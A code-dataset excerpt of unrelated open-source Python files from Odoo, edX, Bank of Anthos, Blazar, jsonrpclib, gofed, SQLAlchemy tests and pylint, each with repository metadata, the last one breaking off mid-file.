OCA/l10n-switzerland
l10n_ch_states/__manifest__.py
Python
agpl-3.0
493
0
# Copyright 2019-2020 Camptocamp SA # Copyright 2015 Mathias Neef copadoME
DIA UG # License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl). { "name": "Switzerland Country States", "category": "Localisation", "summary": "", "version": "14.0.1.0.0", "author": "copado MEDIA UG," "Odoo Community Association (OCA)", "website": "https://github.com/OCA/l10n-switzerland", "license": "AGPL-3", "depends": ["base"], "data": ["data/res_countr
y_states.xml"], }
romain-li/edx-platform
common/test/acceptance/pages/lms/courseware.py
Python
agpl-3.0
23,445
0.003156
""" Courseware page. """ from bok_choy.page_object import PageObject, unguarded from bok_choy.promise import EmptyPromise import re from selenium.webdriver.common.action_chains import ActionChains from common.test.acceptance.pages.lms.bookmarks import BookmarksPage from common.test.acceptance.pages.lms.course_page import CoursePage class CoursewarePage(CoursePage): """ Course info. """ url_path = "courseware/" xblock_component_selector = '.vert .xblock' # TODO: TNL-6546: Remove sidebar selectors section_selector = '.chapter' subsection_selector = '.chapter-content-container a' def __init__(self, browser, course_id): super(CoursewarePage, self).__init__(browser, course_id) self.nav = CourseNavPage(browser, self) def is_browser_on_page(self): return self.q(css='.course-content').present @property def chapter_count_in_navigation(self): """ Returns count of chapters available on LHS navigation. """ return len(self.q(css='nav.course-navigation a.chapter')) # TODO: TNL-6546: Remove and find callers. @property def num_sections(self): """ Return the number of sections in the sidebar on the page """ return len(self.q(css=self.section_selector)) # TODO: TNL-6546: Remove and find callers. @property def num_subsections(self): """ Return the number of subsections in the sidebar on the page, including in collapsed sections """ return len(self.q(css=self.subsection_selector)) @property def xblock_components(self): """ Return the xblock components within the unit on the page. """ return self.q(css=self.xblock_component_selector) @property def num_xblock_components(self): """ Return the number of rendered xblocks within the unit on the page """ return len(self.xblock_components) def xblock_component_type(self, index=0): """ Extract rendered xblock component type. Returns: str: xblock module type index: which xblock to query, where the index is the vertical display within the page (default is 0) """ return self.q(css=self.xblock_component_selector).attrs('data-block-type')[index] def xblock_component_html_content(self, index=0): """ Extract rendered xblock component html content. Returns: str: xblock module html content index: which xblock to query, where the index is the vertical display within the page (default is 0) """ # When Student Notes feature is enabled, it looks for the content inside # `.edx-notes-wrapper-content` element (Otherwise, you will get an # additional html related to Student Notes). element = self.q(css='{} .edx-notes-wrapper-content'.format(self.xblock_component_selector)) if element.first: return element.attrs('innerHTML')[index].strip() else: return self.q(css=self.xblock_component_selector).attrs('innerHTML')[index].strip() def verify_to
oltips_displayed(self): """ Verify that all sequence navigation bar tooltips are being displayed upon mouse hover. If a tool
tip does not appear, raise a BrokenPromise. """ for index, tab in enumerate(self.q(css='#sequence-list > li')): ActionChains(self.browser).move_to_element(tab).perform() self.wait_for_element_visibility( '#tab_{index} > .sequence-tooltip'.format(index=index), 'Tab {index} should appear'.format(index=index) ) @property def course_license(self): """ Returns the course license text, if present. Else returns None. """ element = self.q(css="#content .container-footer .course-license") if element.is_present(): return element.text[0] return None def go_to_sequential_position(self, sequential_position): """ Within a section/subsection navigate to the sequential position specified by `sequential_position`. Arguments: sequential_position (int): position in sequential bar """ def is_at_new_position(): """ Returns whether the specified tab has become active. It is defensive against the case where the page is still being loaded. """ active_tab = self._active_sequence_tab try: return active_tab and int(active_tab.attrs('data-element')[0]) == sequential_position except IndexError: return False sequential_position_css = '#sequence-list #tab_{0}'.format(sequential_position - 1) self.q(css=sequential_position_css).first.click() EmptyPromise(is_at_new_position, "Position navigation fulfilled").fulfill() @property def sequential_position(self): """ Returns the position of the active tab in the sequence. """ tab_id = self._active_sequence_tab.attrs('id')[0] return int(tab_id.split('_')[1]) @property def _active_sequence_tab(self): # pylint: disable=missing-docstring return self.q(css='#sequence-list .nav-item.active') @property def is_next_button_enabled(self): # pylint: disable=missing-docstring return not self.q(css='.sequence-nav > .sequence-nav-button.button-next.disabled').is_present() @property def is_previous_button_enabled(self): # pylint: disable=missing-docstring return not self.q(css='.sequence-nav > .sequence-nav-button.button-previous.disabled').is_present() def click_next_button_on_top(self): # pylint: disable=missing-docstring self._click_navigation_button('sequence-nav', 'button-next') def click_next_button_on_bottom(self): # pylint: disable=missing-docstring self._click_navigation_button('sequence-bottom', 'button-next') def click_previous_button_on_top(self): # pylint: disable=missing-docstring self._click_navigation_button('sequence-nav', 'button-previous') def click_previous_button_on_bottom(self): # pylint: disable=missing-docstring self._click_navigation_button('sequence-bottom', 'button-previous') def _click_navigation_button(self, top_or_bottom_class, next_or_previous_class): """ Clicks the navigation button, given the respective CSS classes. """ previous_tab_id = self._active_sequence_tab.attrs('data-id')[0] def is_at_new_tab_id(): """ Returns whether the active tab has changed. It is defensive against the case where the page is still being loaded. """ active_tab = self._active_sequence_tab try: return active_tab and previous_tab_id != active_tab.attrs('data-id')[0] except IndexError: return False self.q( css='.{} > .sequence-nav-button.{}'.format(top_or_bottom_class, next_or_previous_class) ).first.click() EmptyPromise(is_at_new_tab_id, "Button navigation fulfilled").fulfill() @property def can_start_proctored_exam(self): """ Returns True if the timed/proctored exam timer bar is visible on the courseware. """ return self.q(css='button.start-timed-exam[data-start-immediately="false"]').is_present() def start_timed_exam(self): """ clicks the start this timed exam link """ self.q(css=".xblock-student_view .timed-exam .start-timed-exam").first.click() self.wait_for_element_presence(".proctored_exam_status .exam-timer", "Timer bar") def stop_timed_exam(self): """ clicks the stop this timed exam link """ self.q(css=".proctored_exam_status button.exam-button-turn-in-exam").first.click() self.wait_for_element_absence(".proctored_exam_status .exam-button-turn-in-exam", "End Exam Button gone")
GoogleCloudPlatform/bank-of-anthos
src/userservice/db.py
Python
apache-2.0
4,158
0.000962
# Copyright 2019 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ db manages interactions with the underlying database """ import logging import random from sqlalchemy import create_engine, MetaData, Table, Column, String, Date, LargeBinary from opentelemetry.instrumentation.sqlalchemy import SQLAlchemyInstrumentor class UserDb: """ UserDb provides a set of helper functions over SQLAlchemy to handle db operations for userservice """ def __init__(self, uri, logger=logging): self.engine = create_engine(uri) self.logger = logger self.users_table = Table( 'users', MetaData(self.engine), Column('accountid', String, primary_key=True), Column('username', String, unique=True, nullable=False), Column('passhash', LargeBinary, nullable=False), Column('firstname', String, nullable=False), Column('lastname', String, nullable=False), Column('birthday', Date, nullable=False), Column('timezone', String, nullable=False), Column('address', String, nullable=False), Column('state', String, nullable=False), Column('zip', String, nullable=False), Column('ssn', String, nullable=False), ) # Set up tracing autoinstrumentation for sqlalchemy SQLAlchemyInstrumentor().instrument( engine=self.engine, service='users', ) def add_user(self, user): """Add a user to the database. Params: user - a key/value dict of attributes describing a new user {'username': username, 'password': password, ...} Raises: SQLAlchemyError if there was an issue with the database """ statement = self.users_table.insert().values(user) self.logger.debug('QUERY: %s', str(statement)) with self.engine.connect() as conn: conn.execute(statement) def generate_accountid(self): """Generates a globally unique alphanumerical accountid.""" self.logger.debug('Generating an account ID') accountid = None with self.engine.connect() as conn: while accountid is None: accountid = str(random.randint(1e9, (1e10 - 1))) statement = self.users_table.select().where( self.users_table.c.accountid == accountid ) self.logger.debug('QUERY: %s', str(statement)) result = conn.execute(statement).first() # If there already exists an account, try again. if result is not None: accountid = None
self.logger.debug('RESULT: account ID already exists. Trying again') self.logger.debug('RESULT: account ID generated.') return accountid def get_user(self, username): """Get user data for the specified username. Params: username - the username of the user Return: a key/value
dict of user attributes, {'username': username, 'accountid': accountid, ...} or None if that user does not exist Raises: SQLAlchemyError if there was an issue with the database """ statement = self.users_table.select().where(self.users_table.c.username == username) self.logger.debug('QUERY: %s', str(statement)) with self.engine.connect() as conn: result = conn.execute(statement).first() self.logger.debug('RESULT: fetched user data for %s', username) return dict(result) if result is not None else None
ChameleonCloud/blazar
blazar/db/migration/alembic_migrations/versions/42c7fd6e792e_add_device_reservation.py
Python
apache-2.0
5,436
0.000552
# Copyright 2021 OpenStack Foundation. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and # limitations under the License. """add device reservation Revision ID: 42c7fd6e792e Revises: 02e2f2186d98 Create Date: 2021-06-22 15:27:00.239725 """ # revision identifiers, used by Alembic. revision = '42c7fd6e792e' down_revision = '02e2f2186d98' from alembic import op import sqlalchemy as sa from sqlalchemy.dialects import mysql def upgrade(): # ### commands auto generated by Alembic - please adjust! ### op.create_table('devices', sa.Column('created_at', sa.DateTime(), nullable=True), sa.Column('updated_at', sa.DateTime(), nullable=True), sa.Column('id', sa.String(length=36), nullable=False), sa.Column('name', sa.String(length=255), nullable=False), sa.Column('device_type', sa.Enum('container', 'vm', 'shell', name='allowed_device_types'), nullable=False), sa.Column('device_driver', sa.Enum( 'zun', name='allowed_device_drivers'), nullable=False), sa.Column('reservable', sa.Boolean(), server_default=sa.text('true'), nullable=False), sa.PrimaryKeyConstraint('id') ) op.create_table('device_extra_capabilities', sa.Column('created_at', sa.DateTime(), nullable=True), sa.Column('updated_at', sa.DateTime(), nullable=True), sa.Column('id', sa.String(length=36), nullable=False), sa.Column('device_id', sa.String( length=36), nullable=False), sa.Column('capability_id', sa.String( length=255), nullable=False), sa.Column('capability_value', sa.Text().with_variant( mysql.MEDIUMTEXT(), 'mysql'), nullable=False), sa.ForeignKeyConstraint( ['capability_id'], ['extra_capabilities.id'], ), sa.ForeignKeyConstraint(['device_id'], ['devices.id'], ), sa.PrimaryKeyConstraint('id') ) op.create_table('device_allocations', sa.Column('created_at', sa.DateTime(), nullable=True), sa.Column('updated_at', sa.DateTime(), nullable=True), sa.Column('deleted_at', sa.DateTime(), nullable=True), sa.Column('deleted', sa.String(length=36), nullable=True), sa.Column('id', sa.String(length=36), nullable=False), sa.Column('device_id', sa.String( length=36), nullable=True), sa.Column('reservation_id', sa.String( length=36), nullable=True), sa.ForeignKeyConstraint(['device_id'], ['devices.id'], ), sa.ForeignKeyConstraint(['reservation_id'], [ 'reservations.id'], ), sa.PrimaryKeyConstraint('id') ) op.create_table('device_reservations', sa.Column('created_at', sa.DateTime(), nullable=True), sa.Column('updated_at', sa.DateTime(), nullable=True), sa.Column('deleted_at', sa.DateTime(), nullable=True), sa.Column('deleted', sa.String(length=36), nullable=True), sa.Column('id', sa.String(length=36), nullable=False), sa.Column('reservation_id', sa.String( length=36), nullable=True), sa.Column('count_range', sa.String( length=36), nullable=True), sa.Column('resource_properties', sa.Text().with_variant( mysql.MEDIUMTEXT(), 'mysql'), nullable=True), sa.Column('before_end', sa.String( length=36), nullable=True), sa.ForeignKeyConstraint(['reservation_id'], [ 'reservations.id'], ), sa.PrimaryKeyConstraint('id') ) op.alter_column('instance_reservations', 'affinity', existing_type=mysql.TINYINT(display_width=1), nullable=False) # ### end Alembic commands ### def downgrade(): # ### commands auto generated by Alembic - please adjust! ### op.alter
_column('instance_reservations', 'affinity', existing_type=mysql.TINYINT(display_width=1),
nullable=True) op.drop_table('device_reservations') op.drop_table('device_allocations') op.drop_table('device_extra_capabilities') op.drop_table('devices') # ### end Alembic commands ###
timokoola/okrest
okrest/okrest/urls.py
Python
apache-2.0
449
0.008909
from django.conf.urls import patterns, include, url from django.contrib import admin
from api import views admin
.autodiscover() from rest_framework.routers import DefaultRouter router = DefaultRouter() router.register(r'headings', views.HeadingViewSet) router.register(r'users', views.UserViewSet) urlpatterns = patterns('', url(r'^', include(router.urls)), url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework')) )
pymedusa/Medusa
ext/jsonrpclib/jsonrpc.py
Python
gpl-3.0
43,868
0.000046
#!/usr/bin/python # -- Content-Encoding: UTF-8 -- """ ============================ JSONRPC Library (jsonrpclib) ============================ This library is a JSON-RPC v.2 (proposed) implementation which follows the xmlrpclib API for portability between clients. It uses the same Server / ServerProxy, loads, dumps, etc. syntax, while providing features not present in XML-RPC like: * Keyword arguments * Notifications * Versioning * Batches and batch notifications Eventually, I'll add a SimpleXMLRPCServer compatible library, and other things to tie the thing off nicely
. :) For a quick-start, just open a console and type the following, replacing the server address, method, and parameters appropriately. >>> import jsonrpclib >>> server = jsonrpclib.Server('http://localhost:8181') >>>
server.add(5, 6) 11 >>> server._notify.add(5, 6) >>> batch = jsonrpclib.MultiCall(server) >>> batch.add(3, 50) >>> batch.add(2, 3) >>> batch._notify.add(3, 5) >>> batch() [53, 5] See https://github.com/tcalmant/jsonrpclib for more info. :authors: Josh Marshall, Thomas Calmant :copyright: Copyright 2020, Thomas Calmant :license: Apache License 2.0 :version: 0.4.2 .. Copyright 2020 Thomas Calmant Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ # Standard library import contextlib import logging import os import socket import sys import uuid try: # Python 3 # pylint: disable=F0401,E0611 from http.client import HTTPConnection from urllib.parse import urlparse from xmlrpc.client import Transport as XMLTransport from xmlrpc.client import SafeTransport as XMLSafeTransport from xmlrpc.client import ServerProxy as XMLServerProxy from xmlrpc.client import _Method as XML_Method except ImportError: # Python 2 # pylint: disable=F0401,E0611 from httplib import HTTPConnection # type: ignore from urlparse import urlparse # type: ignore from xmlrpclib import Transport as XMLTransport # type: ignore from xmlrpclib import SafeTransport as XMLSafeTransport # type: ignore from xmlrpclib import ServerProxy as XMLServerProxy # type: ignore from xmlrpclib import _Method as XML_Method # type: ignore try: # Check GZip support import gzip except ImportError: # Python can be built without zlib/gzip support # pylint: disable=C0103 gzip = None # type: ignore # Library includes import jsonrpclib.config import jsonrpclib.jsonclass as jsonclass import jsonrpclib.utils as utils # ------------------------------------------------------------------------------ # Module version __version_info__ = (0, 4, 2) __version__ = ".".join(str(x) for x in __version_info__) # Documentation strings format __docformat__ = "restructuredtext en" # Create the logger _logger = logging.getLogger(__name__) # ------------------------------------------------------------------------------ # JSON library import try: # pylint: disable=F0401,E0611 # Using cjson import cjson # type: ignore _logger.debug("Using cjson as JSON library") # Declare cjson methods def jdumps(obj, encoding="utf-8"): # pylint: disable=unused-argument """ Serializes ``obj`` to a JSON formatted string, using cjson. """ return cjson.encode(obj) def jloads(json_string): """ Deserializes ``json_string`` (a string containing a JSON document) to a Python object, using cjson. """ return cjson.decode(json_string) except ImportError: # pylint: disable=F0401,E0611 # Use json or simplejson try: import json _logger.debug("Using json as JSON library") except ImportError: try: import simplejson as json # type: ignore _logger.debug("Using simplejson as JSON library") except ImportError: _logger.error("No supported JSON library found") raise ImportError( "You must have the cjson, json, or simplejson " "module(s) available." ) # Declare json methods if sys.version_info[0] < 3: def jdumps(obj, encoding="utf-8"): """ Serializes ``obj`` to a JSON formatted string. """ # Python 2 (explicit encoding) return json.dumps(obj, encoding=encoding) else: # Python 3 def jdumps(obj, encoding="utf-8"): # pylint: disable=unused-argument """ Serializes ``obj`` to a JSON formatted string. """ # Python 3 (the encoding parameter has been removed) return json.dumps(obj) def jloads(json_string): """ Deserializes ``json_string`` (a string containing a JSON document) to a Python object. """ return json.loads(json_string) # ------------------------------------------------------------------------------ # XMLRPClib re-implementations class ProtocolError(Exception): """ JSON-RPC error ProtocolError.args[0] can be: * an error message (string) * a (code, message) tuple """ class AppError(ProtocolError): """ Application error: the error code is not in the pre-defined ones AppError.args[0][0]: Error code AppError.args[0][1]: Error message or trace AppError.args[0][2]: Associated data """ def data(self): """ Retrieves the value found in the 'data' entry of the error, or None :return: The data associated to the error, or None """ # Don't know why the pylint error shows up return self.args[0][2] # pylint: disable=unsubscriptable-object class TransportError(ProtocolError): """ Transport error: a specialized protocol error """ def __init__(self, url, errcode, errmsg, msg): """ :param url: Target URL :param errcode: HTTP error code :param errmsg: HTTP error code description :param msg: Exception message """ ProtocolError.__init__(self, url, errcode, errmsg, msg) self.url = url self.errcode = errcode self.errmsg = errmsg self.msg = msg def __repr__(self): return "<{} for {}: {} {}>".format( type(self).__name__, self.url, self.errcode, self.errmsg ) class JSONParser(object): """ Default JSON parser """ def __init__(self, target): """ Associates the target loader to the parser :param target: a JSONTarget instance """ self.target = target def feed(self, data): """ Feeds the associated target with the given data """ self.target.feed(data) @staticmethod def close(): """ Does nothing """ class JSONTarget(object): """ Unmarshalls stream data to a string """ def __init__(self): """ Sets up the unmarshaller """ self.data = [] def feed(self, data): """ Stores the given raw data into a buffer """ # Store raw data as it might not contain whole wide-character self.data.append(data) def close(self): """ Unmarshalls the buffered data """ if not self.data: return "" else: # Use type to have a valid join (str vs. bytes) data = type(self.data[0])().join(self.data) try: # Convert the whole final string data = utils.from_bytes(data) except (TypeError, ValueError): # Try a pass-through pass return data
ingvagabund/gofed
modules/RemoteSpecParser.py
Python
gpl-2.0
2,663
0.015396
# #################################################################### # gofed - set of tools to automize packaging of golang devel codes # Copyright (C) 2014 Jan Chaloupka, jchaloup@redhat.com # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; eith
er version 2 # of the License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. # #################################################################### ################################################################### # TODO: # [ ] - detect more import paths/sources in spec file? # [ ] - detect from %files every build, analyze its content (downloading it from koji by detecting its name # from spec file => no koji latest-builds, which packages/builds are no arch, which are arch specific (el6 beast) # [ ] - all provides of source code import must in a form golang(import_path/...) # [ ] - what files/provides are optional, which should not be in provides (test files, example, ...) # [ ] - golang imports of examples are optional ################################################################### import tempfile from Utils import runCommand from SpecParser import SpecParser from Base import Base class RemoteSpecParser(Base): def __init__(self, branch, package): Base.__init__(self) self.branch = branch self.package = package self.sp_obj = None def parse(self): f = tempfile.NamedTemporaryFile(delete=True) cmd_str = "curl http://pkgs.fedoraproject.org/cgit/rpms/%s.git/plain/%s.spec > %s" runCommand(cmd_str % (self.package, self.package, f.name)) self.sp_obj = SpecParser(f.name) if not self.sp_obj.parse(): self.err = self.sp_obj.getError() f.close() return False f.close() return True def getProvides(self): """Fetch a spec file from pkgdb and get provides from all its [sub]packages""" if self.sp_obj == None: return {} return self.sp_obj.getProvides() def getPackageCommits(self): if self.sp_obj == None: return "" return self.sp_obj.getMacro("commit") def getPkgURL(self): if self.sp_obj == None: return "" return self.sp_obj.getTag("url")
gaomeng1900/SQIP-py
sqip/dashboard/dashboard.py
Python
cc0-1.0
548
0.018248
#!/usr/bin/env python #-*-coding:utf-8-*- # # @author Meng G. # 2016-03-28 restructed from sqip.config import * from sqip.libs import * dashboard = Blueprint('dashboard', __name__,
template_folder='templates') @base.route('/admin/login' , methods=['GET']) @union_bug
def admin_login(): template = env.get_template('login.html') return template.render() @base.route('/admin' , methods=['GET']) @base.route('/admin/<oath:path>' , methods=['GET']) @union_bug def admin(): template = env.get_template('index.html') return template.render()
wuqize/FluentPython
chapter20/bulkfood/bulkfood_v3.py
Python
lgpl-3.0
720
0.005556
#coding=utf-8 class Quantity:
__counter = 0 def __init__(self): cls = self.__class__ prefix = cls.__name__ index = cls.__counter self.storage_name = '_{}#{}'.forma
t(prefix, index) cls.__counter += 1 def __set__(self, isinstance, value): if value > 0: isinstance.__dict__[self.storage_name] = value else: raise ValueError('value must be > 0') class LineItem: weight = Quantity() price = Quantity() def __init__(self, description, weight, price): self.description = description self.weight = weight self.price = price def subtotal(self): return self.weight * self.price
graingert/sqlalchemy
test/dialect/mysql/test_dialect.py
Python
mit
14,932
0
# coding: utf-8 import datetime from sqlalchemy import bindparam from sqlalchemy import Column from sqlalchemy import DateTime from sqlalchemy import func from sqlalchemy import Integer from sqlalchemy import MetaData from sqlalchemy import Table from sqlalchemy import testing from sqlalchemy.dialects import mysql from sqlalchemy.engine.url import make_url from sqlalchemy.testing import engines from sqlalchemy.testing import eq_ from sqlalchemy.testing import expect_warnings from sqlalchemy.testing import fixtures from sqlalchemy.testing import mock from ...engine import test_execute class DialectTest(fixtures.TestBase): __backend__ = True __only_on__ = "mysql" @testing.combinations( (None, "cONnection was kILLEd", "InternalError", "pymysql", True), (None, "cONnection aLREady closed", "InternalError", "pymysql", True), (None, "something broke", "InternalError", "pymysql", False), (2006, "foo", "OperationalError", "mysqldb", True), (2006, "foo", "OperationalError", "pymysql", True), (2007, "foo", "OperationalError", "mysqldb", False), (2007, "foo", "OperationalError", "pymysql", False), ) def test_is_disconnect( self, arg0, message, exc_cls_name, dialect_name, is_disconnect ): class Error(Exception): pass dbapi = mock.Mock() dbapi.Error = Error dbapi.ProgrammingError = type("ProgrammingError", (Error,), {}) dbapi.OperationalError = type("OperationalError", (Error,), {}) dbapi.InterfaceError = type("InterfaceError", (Error,), {}) dbapi.InternalError = type("InternalError", (Error,), {}) dialect = getattr(mysql, dialect_name).dialect(dbapi=dbapi) error = getattr(dbapi, exc_cls_name)(arg0, message) eq_(dialect.is_disconnect(error, None, None), is_disconnect) def test_ssl_arguments_mysqldb(self): from sqlalchemy.dialects.mysql import mysqldb dialect = mysqldb.dialect() self._test_ssl_arguments(dialect) def test_ssl_arguments_oursql(self): from s
qlalchemy.dialects.mysql import oursql dialect = oursql.dialect() self._test_ssl_arguments(dialect) def _t
est_ssl_arguments(self, dialect): kwarg = dialect.create_connect_args( make_url( "mysql://scott:tiger@localhost:3306/test" "?ssl_ca=/ca.pem&ssl_cert=/cert.pem&ssl_key=/key.pem" ) )[1] # args that differ among mysqldb and oursql for k in ("use_unicode", "found_rows", "client_flag"): kwarg.pop(k, None) eq_( kwarg, { "passwd": "tiger", "db": "test", "ssl": { "ca": "/ca.pem", "cert": "/cert.pem", "key": "/key.pem", }, "host": "localhost", "user": "scott", "port": 3306, }, ) @testing.combinations( ("compress", True), ("connect_timeout", 30), ("read_timeout", 30), ("write_timeout", 30), ("client_flag", 1234), ("local_infile", 1234), ("use_unicode", False), ("charset", "hello"), ) def test_normal_arguments_mysqldb(self, kwarg, value): from sqlalchemy.dialects.mysql import mysqldb dialect = mysqldb.dialect() connect_args = dialect.create_connect_args( make_url( "mysql://scott:tiger@localhost:3306/test" "?%s=%s" % (kwarg, value) ) ) eq_(connect_args[1][kwarg], value) def test_mysqlconnector_buffered_arg(self): from sqlalchemy.dialects.mysql import mysqlconnector dialect = mysqlconnector.dialect() kw = dialect.create_connect_args( make_url("mysql+mysqlconnector://u:p@host/db?buffered=true") )[1] eq_(kw["buffered"], True) kw = dialect.create_connect_args( make_url("mysql+mysqlconnector://u:p@host/db?buffered=false") )[1] eq_(kw["buffered"], False) kw = dialect.create_connect_args( make_url("mysql+mysqlconnector://u:p@host/db") )[1] eq_(kw["buffered"], True) def test_mysqlconnector_raise_on_warnings_arg(self): from sqlalchemy.dialects.mysql import mysqlconnector dialect = mysqlconnector.dialect() kw = dialect.create_connect_args( make_url( "mysql+mysqlconnector://u:p@host/db?raise_on_warnings=true" ) )[1] eq_(kw["raise_on_warnings"], True) kw = dialect.create_connect_args( make_url( "mysql+mysqlconnector://u:p@host/db?raise_on_warnings=false" ) )[1] eq_(kw["raise_on_warnings"], False) kw = dialect.create_connect_args( make_url("mysql+mysqlconnector://u:p@host/db") )[1] assert "raise_on_warnings" not in kw @testing.only_on("mysql") def test_random_arg(self): dialect = testing.db.dialect kw = dialect.create_connect_args( make_url("mysql://u:p@host/db?foo=true") )[1] eq_(kw["foo"], "true") @testing.only_on("mysql") @testing.skip_if("mysql+mysqlconnector", "totally broken for the moment") @testing.fails_on("mysql+oursql", "unsupported") def test_special_encodings(self): for enc in ["utf8mb4", "utf8"]: eng = engines.testing_engine( options={"connect_args": {"charset": enc, "use_unicode": 0}} ) conn = eng.connect() eq_(conn.dialect._connection_charset, enc) def test_no_show_variables(self): from sqlalchemy.testing import mock engine = engines.testing_engine() def my_execute(self, statement, *args, **kw): if statement.startswith("SHOW VARIABLES"): statement = "SELECT 1 FROM DUAL WHERE 1=0" return real_exec(self, statement, *args, **kw) real_exec = engine._connection_cls.exec_driver_sql with mock.patch.object( engine._connection_cls, "exec_driver_sql", my_execute ): with expect_warnings( "Could not retrieve SQL_MODE; please ensure the " "MySQL user has permissions to SHOW VARIABLES" ): engine.connect() def test_no_default_isolation_level(self): from sqlalchemy.testing import mock engine = engines.testing_engine() real_isolation_level = testing.db.dialect.get_isolation_level def fake_isolation_level(connection): connection = mock.Mock( cursor=mock.Mock( return_value=mock.Mock( fetchone=mock.Mock(return_value=None) ) ) ) return real_isolation_level(connection) with mock.patch.object( engine.dialect, "get_isolation_level", fake_isolation_level ): with expect_warnings( "Could not retrieve transaction isolation level for MySQL " "connection." ): engine.connect() def test_autocommit_isolation_level(self): c = testing.db.connect().execution_options( isolation_level="AUTOCOMMIT" ) assert c.exec_driver_sql("SELECT @@autocommit;").scalar() c = c.execution_options(isolation_level="READ COMMITTED") assert not c.exec_driver_sql("SELECT @@autocommit;").scalar() def test_isolation_level(self): values = [ "READ UNCOMMITTED", "READ COMMITTED", "REPEATABLE READ", "SERIALIZABLE", ] for value in values: c = testing.db.connect().execution_options(isolation_level=value) eq_(testing.db.dialect.get_isolation_level(c.connection), value) class ParseVersionTest(fixtures.TestBase): @testing.combinations( ((10, 2, 7), "10.2.7-Ma
aheadley/python-naabal
naabal/util/bitio.py
Python
mit
2,763
0.002533
# @source http://rosettacode.org/wiki/Bitwise_IO#Python # @license http://www.gnu.org/licenses/fdl-1.2.html import logging logger = logging.getLogger('naabal.util.bitio') class BitIO(object): BITS_IN_BYTE = 8 DEFAULT_MASK = 1 << (BITS_IN_BYTE - 1) # 0x80 def __init__(self, handle): self._data_buffer = handle self._bit_buffer = 0x00 self._bit_mask = self.DEFAULT_MASK self._bit_idx = 0 def __enter__(self): return self def __exit__(self, type, value, tb): pass @property def index(self): return self._bit_idx class BitWriter(BitIO): def __exit__(self, type, value, tb): self.flush() def write_bit(self, bit): if bit: self._bit_buffer |= self._bit_mask self._bit_mask = self._bit_mask >> 1 if self._bit_mask == 0: self._flush_bit_buffer() self._reset_state() def write_bits(self, value, bit_count): mask = 1 << (bit_count - 1) while mask != 0: if mask & value: self._bit_buffer |= self._bit_mask self._bit_mask = self._bit_mask >> 1 if self._bit_mask == 0: self._flush_bit_buffer() self._reset_state() mask = mask >> 1 def flush(self): if self._bit_mask != self.DEFAULT_MASK: self._flush_bit_buffer() self._reset_state() return self._bit_idx def _flush_bit_buffer(self): self._data_buffer.write(chr(self._bit_buffer)) self._bit_idx += 1 def _reset_state(self): self._bit_buffer = 0x00 self._bit_mask = self.DEFAULT_MASK class BitReader(BitIO): def read_bit(self): if self._bit_mask == self.DEFAULT_MASK: self._load_bit_buffer() value = self._bit_buffer & self._bit_mask self._bit_mask = self._bit_mask >> 1 if self._bit_mask == 0: self._bit_mask = self.DEFAULT_MASK return 1 if value else 0 def read_bits(self, bit_count): mask = 1 << (bit_count - 1) bits_value = 0x00 while mask != 0: if self._bit_mask == self.DEFAULT_MASK: self._load_bit_buffer() if self._bit_buffer & self._bit_mask: bits_value |= mask mask = mask >> 1 self._bit_mask = self._bit_mask >> 1 if self._bit_mask == 0: self._bit_mask = self.DEFAULT_M
ASK return bits_value def _load_bit_buffer(self): c = self._data_buffer.r
ead(1) if c: self._bit_buffer = ord(c) self._bit_idx += 1 else: raise IOError('Attempted to read past EOF')
dbbhattacharya/kitsune
vendor/packages/pylint/test/test_func.py
Python
bsd-3-clause
7,955
0.007291
# Copyright (c) 2003-2008 LOGILAB S.A. (Paris, FRANCE). # http://www.logilab.fr/ -- mailto:contact@logilab.fr # # This program is free software; you can redistribute it and/or modify it under # the terms of the GNU General Public License as published by the Free Software # Foundation; either version 2 of the License, or (at your option) any later # version. # # This program is distributed in the hope that it will be useful, but WITHOUT # ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS # FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. # # You should have received a copy of the GNU General Public License along with # this program; if not, write to the Free Software Foundation, Inc., # 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. """functional/non regression tests for pylint""" import unittest import sys import re import new from os import linesep from os.path import exists from logilab.common import testlib from utils import get_tests_info, fix_path, TestReporter from logilab.astng import MANAGER from pylint.lint import PyLinter from pylint import checkers test_reporter = TestReporter() linter = PyLinter() linter.set_reporter(test_reporter) linter.config.persistent = 0 checkers.initialize(linter) linter.global_set_option('required-attributes', ('__revision__',)) PY23 = sys.version_info >= (2, 3) PY24 = sys.version_info >= (2, 4) PY25 = sys.version_info >= (2, 5) if linesep != '\n': LINE_RGX = re.compile(linesep) def ulines(string): return LINE_RGX.sub('\n', string) else: def ulines(string): return string INFO_TEST_RGX = re.compile('^func_i\d\d\d\d$') def exception_str(ex): """function used to replace default __str__ method of exception instances""" return 'in %s\n:: %s' % (ex.file, ', '.join(ex.args)) class LintTestUsingModule(testlib.TestCase): DEFAULT_PACKAGE = 'input' package = DEFAULT_PACKAGE linter = linter module = None depends = None _TEST_TYPE = 'module' def shortDescription(self): values = { 'mode' : self._TEST_TYPE, 'input': self.module, 